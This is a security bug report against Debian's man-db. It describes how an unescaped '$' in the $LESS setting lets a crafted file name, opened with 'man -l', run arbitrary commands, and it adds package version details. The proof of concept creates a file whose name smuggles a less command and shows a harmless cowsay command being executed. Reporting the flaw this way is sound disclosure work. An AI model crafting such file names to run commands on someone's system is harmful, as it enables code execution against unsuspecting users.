Package: man-db
Version: 2.11.0-1+b1
Tags: security
"$" is a special character in $LESS, but man-db doesn't take care of
neutralizing it. This could be exploited for arbitrary code execution if
the user were tricked to run "man -l" on files with names crafted by the
attacker.
Proof of concept:
$ cp /dev/null $'$+!cowsay pwned\n$+q-P.1'
$ man -l ./*.1
!cowsay pwned
_______
< pwned >
-------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
!done (press RETURN)
-- System Information:
Architecture: i386
Versions of packages man-db depends on:
ii bsdextrautils 2.38.1-1.1+b1
ii bsdmainutils 12.1.7+nmu3
ii groff-base 1.22.4-8
ii debconf 1.5.79
ii libc6 2.35-3
ii libgdbm6 1.23-3
ii libpipeline1 1.5.6-3
ii libseccomp2 2.5.4-1+b1
ii zlib1g 1:1.2.11.dfsg-4.1
Versions of packages man-db suggests:
ii apparmor 3.0.7-1+b1
ii groff 1.22.4-8
ii less 590-1
--
Jakub Wilk
